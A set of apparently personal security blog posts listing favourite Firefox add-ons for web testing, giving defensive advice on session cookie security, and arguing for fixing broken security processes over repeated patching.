Firefox For Ninjas

It’s fairly common to be asked about your favorite tools but the problem is that it’s pretty difficult to give anyone a simple answer.  When dealing with network and application pen testing, there’s probably a tool for every attack vector but the tool you use is going to change based on the task at hand.  If there was one tool I couldn’t do without, it would undoubtedly be Firefox.  On its own it can do some pretty sweet stuff but its extensibility is what make it such a powerful tool.

I thought it would appropriate to list my top 10 Firefox add-ons which I always use for testing web applications.  So, in no particular order:

1. Firebug – Without a doubt one of the most amazing pieces of software ever produced.  Its capabilities are far too numerous to list here but suffice to say that it’s pretty much a must have for anyone in the business of development or security testing.  If this a new tool for you, be sure to check out this tutorial for help getting started.

2. FoxyProxy – FoxyProxy is a very robust proxy add-on and while anonymity is great, I always use it for switching to and from my local proxy.  FoxyProxy also allows for whitelisting, logging and lots more.

3. Web Developer – The Firefox Web Developer add-on is an awesome tool which allows you to do far more than I am even going to get into.  It’s somewhat similar to Firebug in its abilities but some things are just a bit easier to do with Web Developer than with Firebug.  If you’re using it while doing security testing on web applications, make sure to leverage it’s forms tools.

4. Greasemonkey – Greasemonkey is truly awesome and can allow you do some impressive stuff with just a little JavaScript hackery, particularly with more complex client-side controls.  Be sure to check out the Greasemonkey wiki and userscripts.org for some examples and inspiration.

5. Groundspeed – “Groundspeed is an add-on that allows security testers to manipulate the application user interface to eliminate annoying limitations and client-side controls that interfere with the web application penetration tests.”  Enough said :)

6. User Agent Switcher – User Agent Switcher is pretty self explanatory.  It lets you change your user agent on the fly which can come in handy when dealing with more dated content like the sites best viewed with IE5.  It’s of course also great for dealing with mobile applications and IE/Safari/other specific applications.

7. View Source Chart – This add-on is pretty simple and pretty helpful as it’s a great tool to beautify the source code of rendered pages.

8. HackBar – I’m actually not a big fan of this one simply because having it enabled consumes too much browser space for my comfort.  It is however very useful for performing various encoding, encryption and other minor application wizardry tasks.  A personal favorite is the “Split URL” feature which provides a nice URL breakdown – very helpful when dealing with massive URLs.

9. Live HTTP Headers – Not a terribly fancy add-on but useful and simple when you need to view the HTTP headers as you browse.

10. Add N Edit Cookies – Small and useful.  This add-on allows you to add and edit saved cookies and session data.

Have some favorites of your own that weren’t listed?  Leave a comment and let everyone know!

So, about that session data you sent me…

One of the best things about web applications is…well, a lot of things but most notably scalability, extensibility, and cross platform compatibility (lots of other ‘ly words too).  One of the worst things web applications and web services has going for them would be security.  I am sure that we’re all familiar with things like the OWASP Top 10, and WASC, but many developers responsible for creating the applications we depend on so much are often not familiar with this material.  It’s true that there is an abundance of application security information for developers, but it’s rarely ever implemented or regarded as a core component of the SDLC.  Despite the amount of time that we’ve known about certain vulnerabilities, we continue to see them in both small scale and enterprise applications, and to be honest, I don’t think it’s fair to fault the developers.  As of late, the most common vulnerabilities I have seen in web applications are directly related to poor session security and session management.

By no means is this intended as a thorough guide on securing your application nor is it groundbreaking material, but it may serve as a useful primer for those looking for introductory information on securing session data.

Since Wikipedia, Microsoft, OWASP, and others have already done a fine job with the verbiage, a rehash will suffice:

Think of a session as a semi-permanent interactive information interchange, also known as a dialogue, that transpires between two or more communicating devices.  In the context of web applications, the session most frequently refers to the exchange of data between the end user and the remote application.  Lastly, an application can use the session data to track whether a user has authenticated to the application, what resources they have accessed, and when their session expires in addition to a whole lot of other stuff.

So, now that we’re very well versed in all things session related, how do we protect this sensitive information?  Here’s 4 basic things to get you started:

Mark cookies secure

When a user traverses a website, it is not uncommon for the user to be directed to URLs that use both HTTP and HTTPS.  Due to the fact that these page views may not be encrypted and may transmit sensitive session data, all cookies associated with a given user’s session should be marked as secure.  By marking a cookie as secure, this data will not be transmitted over a plain text channel thus minimizing the chance that they will be intercepted.

Mark cookies as HTTP only

Cross-site scripting attacks aren’t new and since preventing XSS would be an entirely different post, best practice dictates that cookies should be marked HTTPOnly.  When a cookie is marked HTTPOnly, its value cannot be read by a client-side script.  It’s particularly useful when dealing with XSS attacks which are commonly used for session hijacking after transmitting a user’s session data to a remote entity.

For example, if successfully used in an XSS attack, JavaScript’s “document.cookie” can be used to create a log entry in the web logs of a server controlled by an attacker.  This log entry would contain the session data required to mount a session hijacking attack.  Additional things need to be present in the application’s behavior in order to successfully hijack someone’s session but most of the time it works with little fuss.

Encrypt all communications between client and server which transmit session data

Marking cookies as secure should prevent them from being sent unencrypted; however, you really shouldn’t rely on just one mechanism to keep that data safe.  If a user is sent to a secure page, think long and hard before you decide to send them back to HTTP and what you are sending with them over that unencrypted connection.  Many times you will see that a site’s login page redirects to https://blahfoobiz.com/login.asp but once the user has logged in, they get sent to http://blahfoobiz.com/myaccount.asp.  It’s great that the credentials have been sent over HTTPS, but since the redirect to myaccount.asp is over HTTP, not only could sensitive session data be transmitted in an insecure fashion, but the data contained on my account.asp is also vulnerable to interception.

Tie your users to the session
I would say that this is probably the most important of the four points listed.  When a user accesses resources on your application, they provide a tremendous amount of information such as source IP address, browser version, operating system and much more.  Since this information is already being sent to the application, make the application use it.  By incorporating this data, you can create a relatively unique fingerprint of the authenticated user which can in turn be used to provide additional session security.  It’s true that just about everything the client sends to you can be forged and that’s unfortunate; however, depending on the client data you are hashing/mashing, reproducing this data can be very difficult for an attacker.  Once you have this information, you can check it against future requests which are made using an established session and verify that the data provided is in fact coming from the original user.  If the information does not match, the session should be effectively terminated.

Again, all of this is far from comprehensive but it seemed worth mentioning.

Broken Processes and Broken Systems

New URL, same post.  Anyways…

Over the past ten years there has been a dramatic shift in information security and the importance it plays in business continuity. This change has moved information security from being widely regarded as an irritating necessity to a mission critical component. With big names and massive breaches, such as T.J. Maxx and Heartland Payment Systems, there is increasing pressure from both consumers and shareholders to better protect corporate and personal assets.

I think we can all agree that more intelligent and more rigid security measures are, well, better, but there’s one major problem: a majority of this new security is so poorly implemented and maintained that it’s really only providing an illusion of security. In my opinion, this is more dangerous than acknowledging that an organization is failing to adequately secure its environment. I mean, if you’ve kind of sort of “secured” this sensitive information once, it’s secured for good, right? What’s even worse is that a majority of the people responsible for propagating such poor security practices are those who have been tasked with securing these valuable assets in the first place! In my experience, this occurs for a variety of reasons which probably aren’t worth getting into right now, but suffice to say that when it comes to the infosec community, there’s a lot of things we need to change – and they need to change fast.

Unfortunately, I don’t have all the answers; in fact, I might not have any answers but I do have some ideas. I think in order to be a successful practitioner of any discipline, one must have rules – beliefs which serve as the basis for your methodology and things which make you a true professional. Many people in the community have grown disenchanted with the attempts made at effective security and many are new to the community and haven’t had the experiences yet to form their own ideas. There’s also a large majority of people who don’t bother with ideas, and just do the things they do because of vendor favoritism, common practices, and even out of pure laziness. The fact of the matter is that there’s no best vendor for everything, common practice does not necessarily mean best practice and if you’re lazy, well you’ve probably stopped reading by now.

I’ve rolled around a lot of ideas in my head for quite awhile now and after some time, it’s all starting to make more sense. Here are some things to think about…

  1. It is important to patch the application and patch the OS, but it is more important to fix the broken process which allows these problems to exist.

This is possibly my biggest concern in information security; the process does not get patched. Vulnerabilities are transient, system state is always subject to change, and you cannot account for every bug and every attack vector, but there is a lot to be said for trying. If you examine any environment, you will find that there is always a tremendous amount of change and these changes are often not properly reviewed in the context of security. Let’s do a walkthrough on this one, and an overly simplified one at that.

Bob is a security engineer at Frobnitz Inc. and he is in charge of quarterly vulnerability scanning and remediation tracking. At the start of the quarter, Bob has scanned all relevant systems and has a nice executive summary complete with some pretty graphs and pie charts. The bad part is that there’s a lot of high and medium severity vulnerabilities in these pies and that’s not a good thing. Now that vulnerability scanning has completed and management is aware of Bob and his red pies, the next logical step takes our friend to remediation efforts. Let’s move the situation along and just say that remediation is a huge success and completes in the most expeditious way (hah). At the end of the quarter, Bob proudly presents his new green pies to management and there is much celebration. With this task completed (for now), Bob goes back to managing the firewalls, IDS/IPS, AV, etc., putting all this silly vulnerability stuff behind him.

As time goes on, Bob finds himself entering Q2 and it’s time to start vulnerability scanning for the quarter. Just like before, the scans complete and Bob has new reports for a quarterly update with the boss. Only there’s one problem, Bob’s green pies are getting red again and just like before, the last thing Bob needs is more red pies. So, in keeping with tradition, Bob goes back to the task of remediation, presents the final report, basks in his green pie charts and waits for next quarter.

Now, there is one major problem here which I would hope many would have noticed:

Insanity: doing the same thing over and over again and expecting different results.
~Albert Einstein

Our fictitious friend parallels many people’s efforts in the field in an unfortunate way. You see, too often people don’t stop and ask the important question of “Why?” when looking at something like scan results, the vulnerabilities are easy to see but taking the time to understand them and furthermore, how to correct the cause takes more effort. Situations such as this are incredibly common; so common that they eventually just become accepted and that’s just about as useful as a bunch of red pies on your weekly/quarterly/whateverly scans, but that’s what you will end up with.

To complicate matters even further, the root cause of such things is often fairly far from your immediate scope and effectively suggesting and implementing these changes can be a full-time job with a lot of push back in no time at all. On this note, it’s important to realize something; everything is within scope. You see, when you provide security services, especially as an internal consultant, all of the teams that are “unrelated” to your work may be introducing new security flaws to the environment. As a result, it’s now related, you need to be involved, and it’s important to exercise your expertise and guide neighboring teams in an effort to improve or even fix the processes and systems. And I feel the need to make this known, but trying to push these changes isn’t the fast track to being the cool kid (sorry). Most people are inherently resistant when it comes to change and that holds very true in IT. From software developers, to the patch management people, to architecture teams and even the guy in marketing who gets told that he can’t run uTorrent at the office anymore, people will likely not enjoy these changes. Please keep one very important thing in mind, our job is to enhance and supplement the integrity and security of the environment and you cannot do that by turning a blind eye to broken processes which expose corporate assets and jeopardize the confidentiality of sensitive information.

Now that expectations have been set and we’re aware it’s not easy to be well liked and be in information security at the same time, what do we do? Well, this goes back to what I said before and that is to say that I don’t have all the answers. But for what it’s worth, I will describe an approach which has worked for me in the past. Be diplomatic, understand the concerns regarding the implementation of your ideas from other teams, establish a rapport so that your ideas will be well-received, and lastly, in subtle ways, be sure to remind others that while you may technically be on different teams, the bigger picture is that you’re all on the same team. Some people might feel like you’re creating more work for them, and at face value, that’s probably true. But if you were to ask someone whether they want to enhance the patch management and system deployment processes or play catch-up with hundreds of machines after quarterly vulnerability scanning, which do you think they would pick?

I think I am out of energy to write down more points, but hopefully I can post them in the near future, time permitting of course. In the meantime, thanks for reading.

Follow

Get every new post delivered to your Inbox.